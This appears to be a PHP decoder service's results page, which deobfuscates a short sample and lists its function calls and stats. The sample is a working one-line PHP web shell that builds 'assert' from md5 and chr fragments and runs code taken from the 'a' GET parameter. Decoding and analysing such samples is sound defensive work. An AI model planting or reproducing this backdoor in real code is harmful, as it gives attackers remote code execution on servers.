Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $a=md5('a').'<br>'; $poc=substr($a,14,1).chr(115).chr(115).substr($a,22,1).chr(114)...
Decoded Output download
<?php
$a=md5('a').'<br>';
$poc=substr($a,14,1).chr(115).chr(115).substr($a,22,1).chr(114).chr(116);
$poc($_GET['a']);
?>
Did this file decode correctly?
Original Code
<?php
$a=md5('a').'<br>';
$poc=substr($a,14,1).chr(115).chr(115).substr($a,22,1).chr(114).chr(116);
$poc($_GET['a']);
?>
Function Calls
| chr | 4 |
| md5 | 1 |
| assert | 1 |
| substr | 2 |
Stats
| MD5 | 6528cc002029c69e5fd89d6434e3a927 |
| Eval Count | 0 |
| Decode Time | 101 ms |